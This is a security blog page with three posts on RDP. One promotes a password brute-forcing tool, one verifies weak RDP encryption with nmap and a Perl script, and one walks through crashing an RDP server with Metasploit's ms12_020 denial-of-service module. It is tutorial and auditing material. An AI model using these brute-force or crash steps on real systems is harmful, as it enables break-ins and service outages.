Showing posts with label rdp. Show all posts
Showing posts with label rdp. Show all posts

Thursday, 24 October 2013

RDP Auditing Tool

Tired of testing or brute forcing using individual credential? Fear not, xTSCrack is here to make it automatic! 


You can download the tool from : http://www.4shared.com/get/HTJog7YJ/xtscrack-09.html

This tool has the following cool features:
---> Test for weak password automatically;
---> Test for weak/user passwords;
---> Wordlist option;
---> Userlist option;
---> Configurable port;
---> Range IP Address audit and more.
The main window

Inputting the Userlist and Wordlist

 Password Found!!!


Read more about it @ https://sites.google.com/site/mobileandcomputingtips/Downhome/Computer-and-Web-Security/freerdpbruteforcetool-xtscrack

Posted by at No comments:
Labels: , , , , , ,

Tuesday, 6 August 2013

Windows Remote Desktop Protocol Weak Encryption Method Allowed - Validating the Findings

Results from Qualys Scan

ISSUE:
-Windows Remote Desktop Protocol Weak Encryption Method Allowed

THREAT:
Remote Desktop Protocol is a protocol by which Terminal Service provides desktop level access to a remote user. It can be used to remotely login and interact with a Windows machine.
Since RDP transfers sensitive information about the user and the system, it can be configured to use encryption to provide privacy and integrity for its sessions. It is possible to configure RDP to use encryption algorithms that are considered insecure, such as RC4 40bit and RC4 56 bit.

IMPACT:
If an attacker has access to the network traffic with RDP sessions using weak encryption methods, then it will be possible for them to bruteforce the encryption parameters and compromise privacy of the RDP session.

SOLUTION:
RDP needs to be configured to use strong encryption methods or use SSL as the privacy and integrity provider. To configure RDP encryption methods 'Terminal Services Configuration' snap-in can be launched in mmc.exe. In 'Terminal Services Configuration' properties dialog box General tab for the Encryption Level 'High' should be selected.

LINKS:
http://technet.microsoft.com/en-us/library/cc770833.aspx
https://www.fishnetsecurity.com/6labs/blog/remote-desktop-protocol-security-creating-successful-implementation


Validating the Findings
In order to validate the findings, we use additional tools to see if we can get the same output as Qualys scan. In this case, Qualys detected that the encryption algorithm used are RC4-40bit and RC5-56bit, hence our objective is to use other tools to get that information.

Using NMAP

nmap -p 3389 --script rdp-enum-encryption <ip>











Using Perl Script







Download the package using wget



#wget http://labs.portcullis.co.uk/download/rdp-sec-check-0.8.tar.gz







Extract the package



#tar -xvzf rdp-sec-check-0.8.tar.gz







Run the script



#./rdp-sec-check-pl <IP address>















References:



http://nmap.org/nsedoc/scripts/rdp-enum-encryption.html



http://labs.portcullis.co.uk/tools/rdp-sec-check/



http://gacksecurity.blogspot.sg/2012/12/rdp-sec-check-audit-tool-for-remote.html














Posted by



at





2 comments:
  


















Labels:
,
,
,
,
,
,
,
,
,
,
,
,
,

















          

        

          

        

Thursday, 30 May 2013


          

        










NMAP & Metasploit - Scan and Exploit in 10mins












READY, SCAN, ATTACK!!!



First, we will find a target and ensure the host is up. We will do this by using Nmap:

#nmap -sn 192.168.71.156









Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command



#nmap --script vuln 192.168.71.156 --reason



With this command, Nmap will execute the NSE script called Vuln and scan the host for vulnerabilities. Once the scan completed, we can see the result and show the available vulnerability of the host. The result even provide us with the link to know more information of the vulnerability.















Now lets exploit that vulnerability! So first we need to locate whether the exploit is in the metasploit database. On your terminal, run







#locate ms12_020







The output shows that the exploit is available in metasploit.











Alternatively, you can also search the exploit in the MSFconsole itself by firing up #msfconsole and then run



#search ms12_020















Now that we know the exploit is available, we will now execute it.







msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids



msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156



msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389



msf  auxiliary(ms12_020_maxchannelids) > run















Once executed, the server will crash!!! Note that this is a Layer 7 DOS attack!






























Posted by



at





1 comment:
  


















Labels:
,
,
,
,
,
,
,
,

















        

      









Subscribe to:
Posts (Atom)